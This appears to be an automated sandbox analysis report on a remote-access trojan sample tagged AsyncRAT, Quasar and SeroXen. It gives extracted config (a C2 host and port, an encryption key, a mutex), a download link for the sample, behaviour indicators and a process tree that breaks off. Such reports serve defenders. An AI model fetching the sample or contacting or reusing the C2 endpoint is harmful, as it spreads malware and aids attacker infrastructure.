asyncrat | hxxps://gofile[.]io/d/2DDghj

Resubmissions

15/04/2023, 06:29

230415-g89aladc88 1

14/04/2023, 01:53

230414-ca7xnagh7v 10

Analysis

max time kernel
1800s
max time network
1801s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
14/04/2023, 01:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/2DDghj

Score

10^/10

asyncrat quasar v15.5.4 | seroxen rat spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

v15.5.4 | SeroXen

us-east-63815.packetriot.net:22685

Mutex

480ee734-a00e-4d8c-8579-704f4f60da38

Attributes

encryption_key
F622E4B012DB6D330923BFB7D9C9757C12AB59FD
install_name
.exe
log_directory
$sxr-Logs
reconnect_delay
3000
startup_key
$sxr-seroxen

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/4352-529-0x000001DC087E0000-0x000001DC0909E000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 19 IoCs

description	pid	Process	procid_target
PID 5656 created 564	5656	Tor_server.bat.exe	3
PID 4352 created 564	4352	$sxr-powershell.exe	3
PID 4352 created 564	4352	$sxr-powershell.exe	3
PID 5656 created 564	5656	Tor_server.bat.exe	3
PID 5656 created 564	5656	Tor_server.bat.exe	3
PID 6164 created 3708	6164	svchost.exe	146
PID 4352 created 564	4352	$sxr-powershell.exe	3
PID 4352 created 564	4352	$sxr-powershell.exe	3
PID 5912 created 564	5912	$sxr-powershell.exe	3
PID 6132 created 564	6132	$sxr-powershell.exe	3
PID 4076 created 564	4076	$sxr-powershell.exe	3
PID 5188 created 564	5188	$sxr-powershell.exe	3
PID 2644 created 564	2644	$sxr-powershell.exe	3
PID 660 created 564	660	$sxr-powershell.exe	3
PID 5876 created 564	5876	$sxr-powershell.exe	3
PID 5584 created 564	5584	$sxr-powershell.exe	3
PID 1212 created 564	1212	$sxr-powershell.exe	3
PID 6036 created 564	6036	$sxr-powershell.exe	3
PID 5912 created 564	5912	$sxr-powershell.exe	3

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/4352-529-0x000001DC087E0000-0x000001DC0909E000-memory.dmp	asyncrat

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Executes dropped EXE 22 IoCs

pid	Process
5656	Tor_server.bat.exe
4352	$sxr-powershell.exe
5188	$sxr-powershell.exe
5912	$sxr-powershell.exe
5876	$sxr-powershell.exe
6036	$sxr-powershell.exe
1212	$sxr-powershell.exe
6132	$sxr-powershell.exe
4076	$sxr-powershell.exe
5584	$sxr-powershell.exe
2644	$sxr-powershell.exe
660	$sxr-powershell.exe
4064	$sxr-powershell.exe
7164	$sxr-powershell.exe
1460	$sxr-powershell.exe
6708	$sxr-powershell.exe
6528	$sxr-powershell.exe
6864	$sxr-powershell.exe
5340	$sxr-powershell.exe
768	$sxr-powershell.exe
6220	$sxr-powershell.exe
5308	$sxr-powershell.exe

Drops file in System32 directory 36 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File created	C:\Windows\System32\vcruntime140d.dll	Tor_server.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.log	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat	DllHost.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	Tor_server.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	Tor_server.bat.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177	svchost.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V0100001.log	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm	DllHost.exe
File created	C:\Windows\System32\vcruntime140_1d.dll	Tor_server.bat.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.log	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V0100001.log	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	Tor_server.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File created	C:\Windows\System32\ucrtbased.dll	Tor_server.bat.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	svchost.exe

Suspicious use of SetThreadContext 18 IoCs

description	pid	Process	procid_target
PID 5656 set thread context of 5216	5656	Tor_server.bat.exe	118
PID 4352 set thread context of 4320	4352	$sxr-powershell.exe	120
PID 4352 set thread context of 516	4352	$sxr-powershell.exe	131
PID 5656 set thread context of 5928	5656	Tor_server.bat.exe	132
PID 5656 set thread context of 6116	5656	Tor_server.bat.exe	133
PID 4352 set thread context of 6776	4352	$sxr-powershell.exe	149
PID 4352 set thread context of 6004	4352	$sxr-powershell.exe	148
PID 5912 set thread context of 4448	5912	$sxr-powershell.exe	151
PID 6132 set thread context of 4220	6132	$sxr-powershell.exe	152
PID 4076 set thread context of 5980	4076	$sxr-powershell.exe	153
PID 5188 set thread context of 3080	5188	$sxr-powershell.exe	154
PID 2644 set thread context of 6960	2644	$sxr-powershell.exe	155
PID 660 set thread context of 6904	660	$sxr-powershell.exe	156
PID 5876 set thread context of 3276	5876	$sxr-powershell.exe	160
PID 5584 set thread context of 6140	5584	$sxr-powershell.exe	157
PID 1212 set thread context of 1012	1212	$sxr-powershell.exe	158
PID 6036 set thread context of 6700	6036	$sxr-powershell.exe	159
PID 5912 set thread context of 164	5912	$sxr-powershell.exe	171

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-powershell.exe	Tor_server.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	Tor_server.bat.exe
File created	C:\Windows\$sxr-seroxen1\$sxr-nircmd.exe	Tor_server.bat.exe
File created	C:\Windows\$sxr-seroxen1\$sxr-Uni.bat	Tor_server.bat.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
6520	3988	WerFault.exe	24
6420	4428	WerFault.exe	29
1808	3724	WerFault.exe	143
4920	3708	WerFault.exe	146
3056	3988	WerFault.exe	24

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
7080	taskkill.exe

Modifies data under HKEY_USERS 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,41484365,39965824,7153487,17110988,17962391,17962392,3702920,3462423,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617,17110992"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133259180402837615"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4724	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4124	chrome.exe
4124	chrome.exe
5656	Tor_server.bat.exe
5656	Tor_server.bat.exe
5656	Tor_server.bat.exe
5656	Tor_server.bat.exe
5656	Tor_server.bat.exe
5216	dllhost.exe
5216	dllhost.exe
5216	dllhost.exe
5216	dllhost.exe
5656	Tor_server.bat.exe
5656	Tor_server.bat.exe
4352	$sxr-powershell.exe
4352	$sxr-powershell.exe
4352	$sxr-powershell.exe
4352	$sxr-powershell.exe
4352	$sxr-powershell.exe
4320	dllhost.exe
4320	dllhost.exe
4320	dllhost.exe
4320	dllhost.exe
4352	$sxr-powershell.exe
4352	$sxr-powershell.exe
5188	$sxr-powershell.exe
5188	$sxr-powershell.exe
5188	$sxr-powershell.exe
5912	$sxr-powershell.exe
5912	$sxr-powershell.exe
5912	$sxr-powershell.exe
5188	$sxr-powershell.exe
5912	$sxr-powershell.exe
5188	$sxr-powershell.exe
5188	$sxr-powershell.exe
5876	$sxr-powershell.exe
5876	$sxr-powershell.exe
5912	$sxr-powershell.exe
5912	$sxr-powershell.exe
6036	$sxr-powershell.exe
6036	$sxr-powershell.exe
5876	$sxr-powershell.exe
6036	$sxr-powershell.exe
6036	$sxr-powershell.exe
1212	$sxr-powershell.exe
1212	$sxr-powershell.exe
5876	$sxr-powershell.exe
6036	$sxr-powershell.exe
6036	$sxr-powershell.exe
5876	$sxr-powershell.exe
5876	$sxr-powershell.exe
1212	$sxr-powershell.exe
6132	$sxr-powershell.exe
6132	$sxr-powershell.exe
1212	$sxr-powershell.exe
6132	$sxr-powershell.exe
4076	$sxr-powershell.exe
4076	$sxr-powershell.exe
1212	$sxr-powershell.exe
1212	$sxr-powershell.exe
6132	$sxr-powershell.exe
5584	$sxr-powershell.exe
5584	$sxr-powershell.exe
4076	$sxr-powershell.exe
6132	$sxr-powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 37 IoCs

pid	Process
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe
Token: SeShutdownPrivilege	4124	chrome.exe
Token: SeCreatePagefilePrivilege	4124	chrome.exe

Suspicious use of FindShellTrayWindow 41 IoCs

pid	Process
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
1000	dwm.exe
1000	dwm.exe
1000	dwm.exe
1000	dwm.exe
1000	dwm.exe
1000	dwm.exe
1000	dwm.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe
4124	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4352	$sxr-powershell.exe
5912	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4124 wrote to memory of 4100	4124	chrome.exe	66
PID 4124 wrote to memory of 4100	4124	chrome.exe	66
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 3112	4124	chrome.exe	69
PID 4124 wrote to memory of 4240	4124	chrome.exe	68
PID 4124 wrote to memory of 4240	4124	chrome.exe	68
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70
PID 4124 wrote to memory of 4296	4124	chrome.exe	70

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4384	attrib.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:648

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:564
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:1000
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{528517f2-b62e-419e-b02c-7710c851f29d}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5216
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6652865c-dfd0-445b-9b1f-24388360580c}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4320
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c87c12d0-e4d9-4c30-8f6e-d8045ea39875}
  2⤵
  PID:516
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a47f6418-42be-4ce4-8566-4bd911f2e456}
  2⤵
  PID:5928
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b313e61d-f40b-4f30-a0c6-0defdbeb00c0}
  2⤵
  PID:6116
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{63318a7c-85db-4a26-a61a-fbd1a7be4493}
  2⤵
  PID:6004
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{3bb08175-270f-41cf-ba98-acf5fa83e9b4}
  2⤵
  PID:6776
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8f15e62c-8bb0-440c-8a8e-7baff0166928}
  2⤵
  PID:4448
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6a3afe5c-142b-4fe2-a101-1d108a5051e9}
  2⤵
  PID:4220
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c69be382-3701-471c-86a7-d5d62ab93505}
  2⤵
  PID:5980
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f029c4fa-7763-48d9-9d3f-f348ab8811d9}
  2⤵
  PID:3080
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{73e5b0f7-801d-46b5-9356-98f8b4eb6940}
  2⤵
  PID:6960
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{86348c96-6464-43b4-b890-7776c74a1c4f}
  2⤵
  PID:6904
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{6c6301ab-c9da-4a6e-9eba-80b179e20eb5}
  2⤵
  PID:6140
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{8496dfad-0be9-4eb7-80b9-4f4928eccb6a}
  2⤵
  PID:1012
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{da33ffa3-843f-4a94-a7e1-43b85e0d0c6f}
  2⤵
  PID:6700
- C:\Windows\System32\dllhost.exe
